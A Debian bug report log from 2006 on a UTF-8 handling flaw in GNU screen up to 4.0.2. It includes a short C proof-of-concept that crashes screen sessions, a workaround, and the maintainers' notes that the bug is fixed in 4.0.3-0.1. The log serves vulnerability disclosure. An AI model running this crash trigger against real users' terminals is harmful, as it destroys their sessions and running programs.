Debian Bug report logs - #395999
Remote DoS and possible code execution in screen <= 4.0.2

version graph

Package: screen; Maintainer for screen is Axel Beckert <abe@debian.org>; Source for screen is src:screen.

Reported by: friedel@nomaden.org

Date: Sun, 29 Oct 2006 11:18:02 UTC

Severity: grave

Tags: fixed-upstream, patch, security

Merged with 395225

Found in version screen/4.0.2-4.1

Fixed in versions screen/4.0.3-0.1, 4.0.3-0.1

Done: Moritz Muehlenhoff <jmm@inutil.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Adam Lazur <zal@debian.org>:
Bug#395999; Package screen. Full text and rfc822 format available.

Acknowledgement sent to friedel@nomaden.org:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Adam Lazur <zal@debian.org>. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Friedrich Delgado Friedrichs <friedel@nomaden.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Remote DoS and possible code execution in screen <= 4.0.2
Date: Sun, 29 Oct 2006 12:09:21 +0100
Package: screen
Version: 4.0.2-4.1
Severity: critical
Tags: security
Justification: breaks unrelated software


The following proof-of-concept exploit (by dalias @ #screen on
freenode.net, realname not known, probably (hopefully) he's one of the
guys credited in the upstream security announcement) will crash a
screen session with utf8 enabled. (:utf8 on, :defutf8 on)

#include <locale.h>
#include <wchar.h>
#include <stdio.h>
int main() {
 setlocale(LC_CTYPE, "");
 wchar_t i, j, k; for (i=' '; i<0x7f; i++) for (j=0x300; j<0x370; j++) for(k=0x300; k<0x370; k++) printf("%lc%lc%lc", i, j, k); }

A workaround is to disable utf8. ("defutf8 off" in screenrc)

Upstream security announcement is at http://lists.gnu.org/archive/html/screen-users/2006-10/msg00028.html

The whole screen session with all programs running in it will get lost
(hence: "breaks unrelated software") and this can be triggered by any
software sending utf-8 characters to the terminal (such as a console
mail or news reader or irc client).

This is a *possible* remote code execution, because in the debugger
some registers are reportedly overwritten.

Kind regards
     Friedel
-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (990, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-1-k7
Locale: LANG=de_DE.utf8, LC_CTYPE=de_DE.utf8 (charmap=UTF-8) (ignored: LC_ALL set to de_DE.utf8)

Versions of packages screen depends on:
ii  base-passwd                 3.5.11       Debian base system master password
ii  debconf                     1.5.7        Debian configuration management sy
ii  libc6                       2.3.6.ds1-7  GNU C Library: Shared libraries
ii  libncursesw5                5.5-5        Shared libraries for terminal hand
ii  libpam0g                    0.79-4       Pluggable Authentication Modules l
ii  passwd                      1:4.0.18.1-5 change and administer password and

screen recommends no packages.

-- debconf information:
  screen/old_upgrade_prompt: false



Tags added: fixed-upstream Request was from Andreas Henriksson <andreas@fatal.se> to control@bugs.debian.org. Full text and rfc822 format available.

Forcibly Merged 395225 395999. Request was from Andreas Henriksson <andreas@fatal.se> to control@bugs.debian.org. Full text and rfc822 format available.

Message #10 received at 395999-done@bugs.debian.org (full text, mbox):

From: Adam Lazur <zal@debian.org>
To: friedel@nomaden.org, 395999-done@bugs.debian.org
Subject: Re: Bug#395999: Remote DoS and possible code execution in screen <= 4.0.2
Date: Sun, 29 Oct 2006 09:37:45 -0800
Friedrich Delgado Friedrichs (friedel@nomaden.org) said:
> Package: screen
> Version: 4.0.2-4.1
> Severity: critical
> Tags: security
> Justification: breaks unrelated software
> 
> 
> The following proof-of-concept exploit (by dalias @ #screen on
> freenode.net, realname not known, probably (hopefully) he's one of the
> guys credited in the upstream security announcement) will crash a
> screen session with utf8 enabled. (:utf8 on, :defutf8 on)

This is fixed in screen package 4.0.3-0.1

-- 
Adam Lazur



Reply sent to Moritz Muehlenhoff <jmm@inutil.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to friedel@nomaden.org:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #15 received at 395999-done@bugs.debian.org (full text, mbox):

From: Moritz Muehlenhoff <jmm@inutil.org>
To: 395999-done@bugs.debian.org
Subject: Closing with proper version header
Date: Sun, 29 Oct 2006 23:10:31 +0100
Version: 4.0.3-0.1

# Closing versioned, so that it's properly tracked for testing



Reply sent to Moritz Muehlenhoff <jmm@inutil.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Stefan Fritsch <sf@sfritsch.de>:
Bug acknowledged by developer. Full text and rfc822 format available.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 24 Jun 2007 23:26:16 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 23 15:40:36 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.